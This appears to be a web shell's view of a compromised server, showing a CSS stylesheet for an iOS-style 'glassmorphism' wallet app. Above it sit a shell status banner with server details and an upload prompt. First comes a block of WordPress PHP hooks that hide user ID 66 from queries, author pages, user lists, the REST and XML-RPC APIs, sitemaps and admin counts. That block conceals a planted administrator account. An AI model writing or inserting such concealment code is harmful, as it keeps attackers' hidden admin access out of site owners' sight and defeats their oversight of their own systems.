add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/emajiwallet/public/css/ |
Upload File : |
/* ============================================
iOS 18 Glassmorphism Design System
============================================ */
/* Root Variables - iOS Color Palette */
:root {
/* iOS System Colors */
--ios-blue: #007AFF;
--ios-green: #34C759;
--ios-indigo: #5856D6;
--ios-orange: #FF9500;
--ios-pink: #FF2D55;
--ios-purple: #AF52DE;
--ios-red: #FF3B30;
--ios-teal: #5AC8FA;
--ios-yellow: #FFCC00;
/* Background Colors */
--ios-bg-primary: #F2F2F7;
--ios-bg-secondary: #FFFFFF;
--ios-bg-tertiary: #F9F9F9;
/* Text Colors */
--ios-text-primary: #000000;
--ios-text-secondary: #3C3C43;
--ios-text-tertiary: #8E8E93;
/* Glass Effect Variables */
--glass-blur: 40px;
--glass-opacity: 0.7;
--glass-border: rgba(255, 255, 255, 0.18);
/* Shadows */
--shadow-sm: 0 2px 8px rgba(0, 0, 0, 0.08);
--shadow-md: 0 4px 16px rgba(0, 0, 0, 0.12);
--shadow-lg: 0 8px 32px rgba(0, 0, 0, 0.16);
/* Border Radius */
--radius-xs: 8px;
--radius-sm: 12px;
--radius-md: 16px;
--radius-lg: 20px;
--radius-xl: 24px;
--radius-2xl: 32px;
}
/* ============================================
Base Styles
============================================ */
body {
font-family: -apple-system, BlinkMacSystemFont, "SF Pro Display", "SF Pro Text", "Helvetica Neue", sans-serif;
font-size: 17px;
line-height: 1.47;
color: var(--ios-text-primary);
background: linear-gradient(180deg, #E3F2FD 0%, #F5F5F5 100%);
background-attachment: fixed;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
/* ============================================
Glass Container
============================================ */
.glass-container {
background: rgba(255, 255, 255, 0.75);
backdrop-filter: blur(var(--glass-blur)) saturate(180%);
-webkit-backdrop-filter: blur(var(--glass-blur)) saturate(180%);
border: 1px solid var(--glass-border);
box-shadow: var(--shadow-lg);
border-radius: var(--radius-2xl);
max-width: 430px;
margin: 0 auto;
overflow: hidden;
}
@media (max-width: 430px) {
.glass-container {
border-radius: 0;
max-width: 100%;
min-height: 100vh;
}
}
/* ============================================
Navigation Bar (iOS Style)
============================================ */
.navbar {
background: rgba(255, 255, 255, 0.85) !important;
backdrop-filter: blur(20px) saturate(180%);
-webkit-backdrop-filter: blur(20px) saturate(180%);
border-bottom: 0.5px solid rgba(0, 0, 0, 0.08);
padding: 12px 16px;
}
.navbar-brand {
font-size: 20px;
font-weight: 600;
letter-spacing: -0.4px;
color: var(--ios-text-primary) !important;
}
.nav-link {
font-size: 16px;
font-weight: 500;
color: var(--ios-text-secondary) !important;
padding: 8px 12px !important;
border-radius: var(--radius-sm);
transition: all 0.2s ease;
}
/* DISABLED FOR MOBILE: .nav-link:hover {
/* background: rgba(0, 122, 255, 0.1);
/* color: var(--ios-blue) !important;
/* }
.nav-link.active {
background: rgba(0, 122, 255, 0.15);
color: var(--ios-blue) !important;
font-weight: 600;
}
/* ============================================
Glass Cards
============================================ */
.glass-card {
background: rgba(255, 255, 255, 0.75);
backdrop-filter: blur(30px) saturate(150%);
-webkit-backdrop-filter: blur(30px) saturate(150%);
border: 1px solid rgba(255, 255, 255, 0.25);
border-radius: var(--radius-xl);
box-shadow: var(--shadow-md);
padding: 20px;
transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
overflow: hidden;
position: relative;
}
/* Removed gradient line from top of glass cards */
/* DISABLED FOR MOBILE: .glass-card:hover {
/* transform: translateY(-4px) scale(1.02);
/* box-shadow: var(--shadow-lg);
/* border-color: rgba(255, 255, 255, 0.4);
/* }
.glass-card:active {
transform: translateY(-2px) scale(1.01);
}
/* ============================================
Card Variants
============================================ */
.card {
border: none;
border-radius: var(--radius-xl);
overflow: hidden;
transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
}
.card.glass-card.profession {
background: linear-gradient(135deg,
rgba(52, 199, 89, 0.85) 0%,
rgba(52, 199, 89, 0.95) 100%
);
backdrop-filter: blur(20px);
color: white;
}
.card.glass-card.qualification {
background: linear-gradient(135deg,
rgba(88, 86, 214, 0.85) 0%,
rgba(88, 86, 214, 0.95) 100%
);
backdrop-filter: blur(20px);
color: white;
}
.card.job {
background: linear-gradient(135deg,
rgba(219, 224, 220, 0.85) 0%,
rgba(221, 226, 222, 0.95) 100%
);
backdrop-filter: blur(20px);
color: black;
}
.card.glass-card.educator {
background: linear-gradient(135deg,
rgba(90, 200, 250, 0.85) 0%,
rgba(90, 200, 250, 0.95) 100%
);
backdrop-filter: blur(20px);
color: white;
}
.card.glass-card.credential {
background: rgba(255, 255, 255, 0.9);
backdrop-filter: blur(20px);
}
/* Tile Cards */
.card.tile-card,
.card.tile {
border-radius: var(--radius-lg);
padding: 20px;
cursor: pointer;
position: relative;
overflow: hidden;
}
.card.tile-card::after,
.card.tile::after {
content: '';
position: absolute;
top: 0;
right: 0;
width: 100px;
height: 100px;
background: radial-gradient(circle, rgba(255, 255, 255, 0.2) 0%, transparent 70%);
pointer-events: none;
}
/* Icon Cards */
.card.icon {
aspect-ratio: 1 / 1;
display: flex;
flex-direction: column;
justify-content: center;
align-items: center;
border-radius: var(--radius-md);
padding: 12px;
font-size: 0.8rem;
position: relative;
overflow: hidden;
}
.card.icon img {
max-height: 60%;
max-width: 80%;
object-fit: contain;
filter: drop-shadow(0 2px 4px rgba(0, 0, 0, 0.1));
}
/* ============================================
Buttons (iOS Style)
============================================ */
.btn {
font-size: 16px;
font-weight: 600;
border-radius: var(--radius-sm);
border: none;
transition: all 0.2s ease;
letter-spacing: -0.2px;
}
.btn-primary {
background: var(--ios-blue);
color: white;
box-shadow: 0 2px 8px rgba(0, 122, 255, 0.3);
}
/* DISABLED FOR MOBILE: .btn-primary:hover {
/* background: #0062CC;
/* box-shadow: 0 4px 12px rgba(0, 122, 255, 0.4);
/* transform: translateY(-1px);
/* }
.btn-primary:active {
transform: translateY(0);
box-shadow: 0 1px 4px rgba(0, 122, 255, 0.3);
}
.btn-outline-dark {
border: 1.5px solid rgba(0, 0, 0, 0.15);
background: rgba(255, 255, 255, 0.8);
color: var(--ios-text-primary);
}
/* DISABLED FOR MOBILE: .btn-outline-dark:hover {
/* background: rgba(0, 0, 0, 0.05);
/* border-color: rgba(0, 0, 0, 0.2);
/* }
.btn-danger {
background: var(--ios-red);
color: white;
box-shadow: 0 2px 8px rgba(255, 59, 48, 0.3);
}
/* DISABLED FOR MOBILE: .btn-danger:hover {
/* background: #E8382F;
/* box-shadow: 0 4px 12px rgba(255, 59, 48, 0.4);
/* }
/* ============================================
Badges (iOS Style)
============================================ */
.badge {
padding: 6px 12px;
font-size: 10px;
font-weight: 600;
border-radius: 20px;
letter-spacing: -0.1px;
margin-top: 4px;
}
.badge.bg-success {
background: var(--ios-green) !important;
box-shadow: 0 2px 6px rgba(52, 199, 89, 0.3);
}
.badge.bg-primary {
background: var(--ios-blue) !important;
box-shadow: 0 2px 6px rgba(0, 122, 255, 0.3);
}
.badge.bg-info {
background: var(--ios-teal) !important;
box-shadow: 0 2px 6px rgba(90, 200, 250, 0.3);
}
.badge.bg-warning {
background: var(--ios-orange) !important;
color: white !important;
box-shadow: 0 2px 6px rgba(255, 149, 0, 0.3);
}
.badge.bg-secondary {
background: rgba(142, 142, 147, 0.3) !important;
color: var(--ios-text-secondary) !important;
}
/* ============================================
Alerts (iOS Style)
============================================ */
.alert {
border: none;
border-radius: var(--radius-md);
padding: 16px 20px;
background: rgba(255, 255, 255, 0.9);
backdrop-filter: blur(20px);
box-shadow: var(--shadow-sm);
}
.alert-success {
background: linear-gradient(135deg,
rgba(52, 199, 89, 0.1) 0%,
rgba(52, 199, 89, 0.05) 100%
);
color: #1F7A3D;
border-left: 3px solid var(--ios-green);
}
.alert-info {
background: linear-gradient(135deg,
rgba(0, 122, 255, 0.1) 0%,
rgba(0, 122, 255, 0.05) 100%
);
color: #0051A5;
border-left: 3px solid var(--ios-blue);
}
.alert-warning {
background: linear-gradient(135deg,
rgba(255, 149, 0, 0.1) 0%,
rgba(255, 149, 0, 0.05) 100%
);
color: #A66000;
border-left: 3px solid var(--ios-orange);
}
.alert-danger {
background: linear-gradient(135deg,
rgba(255, 59, 48, 0.1) 0%,
rgba(255, 59, 48, 0.05) 100%
);
color: #C91F1F;
border-left: 3px solid var(--ios-red);
}
/* ============================================
Typography (iOS Style)
============================================ */
h1, h2, h3, h4, h5, h6 {
font-weight: 700;
letter-spacing: -0.5px;
color: var(--ios-text-primary);
}
h1 {
font-size: 34px;
line-height: 1.15;
margin-bottom: 8px;
}
h2 {
font-size: 28px;
line-height: 1.2;
margin-bottom: 8px;
}
h3 {
font-size: 22px;
line-height: 1.25;
margin-bottom: 6px;
}
h4 {
font-size: 20px;
font-weight: 600;
line-height: 1.3;
}
h5 {
font-size: 17px;
font-weight: 600;
line-height: 1.35;
}
.card-title {
font-size: 20px;
font-weight: 600;
letter-spacing: -0.3px;
margin-bottom: 8px;
}
.card-subtitle {
font-size: 14px;
font-weight: 500;
color: var(--ios-text-secondary);
letter-spacing: -0.1px;
}
/* ============================================
Modal (iOS Style)
============================================ */
.modal-content {
border: none;
border-radius: var(--radius-2xl);
background: rgba(255, 255, 255, 0.95);
backdrop-filter: blur(40px);
box-shadow: 0 20px 60px rgba(0, 0, 0, 0.3);
overflow: hidden;
}
.modal-header {
border-bottom: 0.5px solid rgba(0, 0, 0, 0.08);
padding: 20px 24px;
}
.modal-title {
font-size: 22px;
font-weight: 700;
letter-spacing: -0.4px;
}
.modal-body {
padding: 24px;
}
.modal-footer {
border-top: 0.5px solid rgba(0, 0, 0, 0.08);
padding: 16px 24px;
}
.btn-close {
opacity: 0.4;
transition: opacity 0.2s;
}
/* DISABLED FOR MOBILE: .btn-close:hover {
/* opacity: 0.8;
/* }
/* ============================================
Credential Tiles (Enhanced Glass)
============================================ */
.credential-tile {
background: rgba(255, 255, 255, 0.85);
backdrop-filter: blur(20px) saturate(150%);
border: 1px solid rgba(255, 255, 255, 0.3);
border-radius: var(--radius-md);
padding: 12px;
transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
cursor: pointer;
position: relative;
overflow: hidden;
}
.credential-tile::before {
content: '';
position: absolute;
top: -50%;
left: -50%;
width: 200%;
height: 200%;
background: radial-gradient(circle, rgba(255, 255, 255, 0.1) 0%, transparent 60%);
opacity: 0;
transition: opacity 0.3s;
}
/* DISABLED FOR MOBILE: .credential-tile:hover::before {
/* opacity: 1;
/* }
/* DISABLED FOR MOBILE: .credential-tile:hover {
/* transform: translateY(-4px) scale(1.03);
/* box-shadow: 0 8px 24px rgba(0, 0, 0, 0.15);
/* border-color: rgba(255, 255, 255, 0.5);
/* }
/* ============================================
Form Controls (iOS Style)
============================================ */
.form-control,
.form-select {
border: 1px solid rgba(0, 0, 0, 0.1);
border-radius: var(--radius-xs);
padding: 12px 16px;
font-size: 16px;
background: rgba(255, 255, 255, 0.9);
transition: all 0.2s ease;
}
.form-control:focus,
.form-select:focus {
border-color: var(--ios-blue);
box-shadow: 0 0 0 4px rgba(0, 122, 255, 0.1);
outline: none;
}
.form-label {
font-size: 14px;
font-weight: 600;
color: var(--ios-text-secondary);
margin-bottom: 8px;
letter-spacing: -0.1px;
}
/* ============================================
Scrollbar (iOS Style)
============================================ */
::-webkit-scrollbar {
width: 8px;
height: 8px;
}
::-webkit-scrollbar-track {
background: rgba(0, 0, 0, 0.05);
}
::-webkit-scrollbar-thumb {
background: rgba(0, 0, 0, 0.2);
border-radius: 10px;
}
/* ::-webkit-scrollbar-thumb:hover {
/* background: rgba(0, 0, 0, 0.3);
/* }
/* ============================================
Animations
============================================ */
@keyframes fadeInUp {
from {
opacity: 0;
transform: translateY(20px);
}
to {
opacity: 1;
transform: translateY(0);
}
}
.fade-in-up {
animation: fadeInUp 0.4s cubic-bezier(0.4, 0, 0.2, 1);
}
/* ============================================
Utility Classes
============================================ */
.glass-blur {
backdrop-filter: blur(var(--glass-blur));
-webkit-backdrop-filter: blur(var(--glass-blur));
}
.shadow-ios {
box-shadow: var(--shadow-md);
}
.text-ios-secondary {
color: var(--ios-text-secondary);
}
.text-ios-tertiary {
color: var(--ios-text-tertiary);
}
.bg-glass {
background: rgba(255, 255, 255, 0.75);
backdrop-filter: blur(30px) saturate(150%);
-webkit-backdrop-filter: blur(30px) saturate(150%);
}
/* ============================================
Square Qualification Cards
============================================ */
.glass-card.qualification-square {
aspect-ratio: 1 / 1;
display: flex;
flex-direction: column;
justify-content: center;
align-items: center;
padding: 12px;
}
.glass-card.qualification-square .qualification-title {
font-size: 1rem;
line-height: 1.15;
display: -webkit-box;
-webkit-line-clamp: 4;
line-clamp: 4;
-webkit-box-orient: vertical;
overflow: hidden;
text-overflow: ellipsis;
margin-bottom: 0.25rem;
max-height: 4.5rem;
word-break: break-word;
}
/* ============================================
Organization Logos
============================================ */
.org-logo {
object-fit: contain;
border-radius: 4px;
}
.org-logo:not([src]),
.org-logo[src=""],
.org-logo[src*="undefined"] {
display: none;
}
.org-logo-sm {
height: 20px;
width: 20px;
flex-shrink: 0;
}
.org-logo-md {
height: 24px;
width: 24px;
flex-shrink: 0;
}
.org-logo-lg {
height: 32px;
width: 32px;
flex-shrink: 0;
}
.org-logo-xl {
max-height: 80px;
width: auto;
}
/* ============================================
Responsive Adjustments
============================================ */
@media (max-width: 768px) {
h1 { font-size: 28px; }
h2 { font-size: 24px; }
h3 { font-size: 20px; }
.glass-card {
border-radius: var(--radius-lg);
}
.card.tile-card,
.card.tile {
border-radius: var(--radius-md);
}
}